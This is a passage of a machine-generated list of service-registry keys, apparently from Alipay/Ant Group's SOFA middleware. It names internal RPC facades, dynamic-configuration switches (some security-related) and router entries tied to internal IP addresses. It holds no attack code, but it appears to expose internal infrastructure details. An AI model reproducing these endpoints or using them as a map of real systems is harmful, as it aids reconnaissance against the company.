EFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.authprod.facade.account.AccountLinkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.smartFoRealSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adbasiclib.ad.facade.AdServiceFacade:1.0:adexchangeasdsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MHCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipricecore.common.service.facade.PriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.DoneTaskExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.assess.appraisal.AppraisalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.CertFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.complaintPlayback.PlayBackExpEventClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.openid.OpenIdConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.MineKnowledgeMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.metric.AnalysisDimensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.shared.manager.drm.ContentSystemParamDRM.allRemmendTag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantTreeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotonemng.common.service.api.SmsLineSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbaudit.common.service.facade.audit.DishAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:globalprod_reg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.ServiceTask:1.0:campConfigServiceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.library.facade.LibraryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inssdu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.APIDrConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.176.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.checker.facade.api.PaycheckerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.charge.clientDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.96.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.custcenter.service.facade.InvolvedPartyRoleViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.zpaas.biz.ops.common.ReleaseDrmResource.pauseReleaseDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mwalletmng.contentfusionConfigDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.KBCommodityOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:authweb@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apintegrationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbmall.facade.open.service.ShopInfoOpenQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DECISION_SECONDARY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.consumerRunModeUctProcessRecord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.consumeCorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_LOAN_DEFAULT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kabaoprod.service.facade.api.AlipassApplicableShopFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.payment.cashierpay.CreateAndApplyCashierRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.abos.AbosContractInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cloudprovision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.mng.BizConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.payment.PaymentColumnQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.cluster.ClusterOperationService:1.0:commonJenkinsClusterOperationServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.zskynet.zskynetDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprotocol.common.facade.service.FundProtocolFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.AuditTrackConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:csa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.gray.api.AppCustomGrayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicGitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundMerchantConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.conf.MenuConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.232.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.**#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.config.MobileCodeConfigWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.spi.BatchArSpi:1.0:ordercore_batchArSpiMock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:templateFormCommonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpcmc.orderpool.credit.WhiteListOperationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.developerops.facade.api.ICrowdOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.drm.ShumiSwitchDrmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.product.v3.ProductQueryV3Facade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.camp.CampFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.live.LiveEquityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.poscore.censusLogSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsContractConflictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alplan.service.facade.FinancePlanConstraintScaleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.PaymentmngLimitDimValueConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.landlordgame.facade.api.ActivityCleanDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insiop.common.service.facade.module.InsIopEntryLibMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.drm.MyddsServiceVersionDrmHandler.dt,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_HAPM_DataSource_Status#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mydds.dassmetaDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.facade.api.report.ReceivableAgingReportQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.category.api.CategoryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.timeoutcallback.TimeoutCallbackGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.assistinvestigate.core.RequireFreezeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.debug.api.RobotDebugService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:AMLINTELLIJOPERATION@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaggexpcore.common.grayengine.service.GrayControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAssetViewQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.taskOptString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bumng.common.service.facade.UserRolePermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.detailIgnoreRejectInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlExtEscapeRuleString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.certifycenter.service.facade.verifynetwork.VerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.YEBVirtualTAConfigDrm.realTaCodeMapString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizEventDefineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.salesmng.common.service.facade.merchant.api.RelationChangeLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_RQ_Notify_4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.opencore.service.facade.app.AppCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fraudmng.common.service.facade.event.CtuEventPropertyManagerForRone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.70.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.comment.CommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.blood.BloodMetaBaseInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.AppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:adatabus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterAdvanceIndexFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZINTCLCN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.DiscountChannelCampAmtCalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custcpt.facade.UserDeviceRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.processFinishPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mquery.common.service.facade.OpenStoreStatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.164.148.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:govbizwebdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.ServiceInvokeReportConfigSwitch.delaySeed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.kbtrecsys.service.facade.RecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.163.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.175.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.open.research.ResearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.whiteInstIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","ctu.domain.server#@#DEFAULT_INSTANCE_ID#@#ctu.server.group","com.alipay.mrchiswisdom.application.common.service.facade.api.unusual.UnusualQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincompose.common.service.facade.remedy.MessageRemdyService:1.0:remedyFinCompose@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.MockDataManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.wealth.service.WealthSignService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.ValidateResultSetupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.interaction.InteractionComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.BlessingCardProbabilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finvirtualta.core.service.fund.repository.FinShareDetailRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepconnector.facade.service.EpFeedsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:socialportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY@riskinsight#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","cn.com.antcloud.acccenter.common.service.facade.system.TodoTaskServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afts.common.service.facade.ImageConvertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changeriskmanage.common.service.facade.ProcessMngEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.227.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:creditgovernance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_WITHDRAW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilesearch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.process.common.service.facade.WTTicketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcchaos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.gloandecision.common.service.facade.consult.api.PaymentSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-ALMCENTER-SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.charge.HisGoldenDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.RemoteServiceDrmResource.permLimitRulePkgNames,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.record.facade.ProdtransXTSLocalRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.order.ServiceOrderManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvItemSelectiveUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.TinyPluginServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.metadata.endpoint.facade.AppInstanceGroupFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestraweb.web.home.sofarest.ServiceRequestsRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbill.common.service.facade.MbillAsyncFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxqBizManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelBatchModifySensitiveQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.pamir.login.PamIdentitySelectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscript.common.service.facade.ScriptValidationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.query.AppServerQueryFacade:1.0:workload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.openhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.news.isDisableNewsSpecialListValuesCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:accordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.benefitcore.common.severless.facade.spi.SpiBenefitSendFacade:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmoaprod.common.facade.service.MrRefundQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdt.da.common.service.facade.api.CrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.ZdalSequenceRepository:1.0:zdalSequenceRepository@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdEmployeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.facade.fund.api.CancelInstReconLogItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.NewsFlashFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CreditAgreementConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_DAYU_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:fincontentweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.commontools.common.service.facade.SensitiveWordDetectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.findefencecore.common.service.anna.facade.XflushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.processmng.core.service.plugin.drm.PluginDrmAdapter.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.poscore.SharedataDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finopencore.common.service.point.facade.PointTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.LimitDimValueManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interaction.facade.InteractionQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.commandcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@ebppprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.insptmarket.client.account.fetcher.AccountCardFetcher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.AnalyzerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbatch.service.MYBKSettleAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.EbppOpenApiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.distinguishprod.common.service.facade.ResWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:habaseline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@quotvilla#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.membertangram.common.service.facade.subscribe.SubscribeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.project.ProjectUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.indicator.snapshot.SnapshotRecordsService:1.0@DEFAULT#@#DEFAULT_INSTANC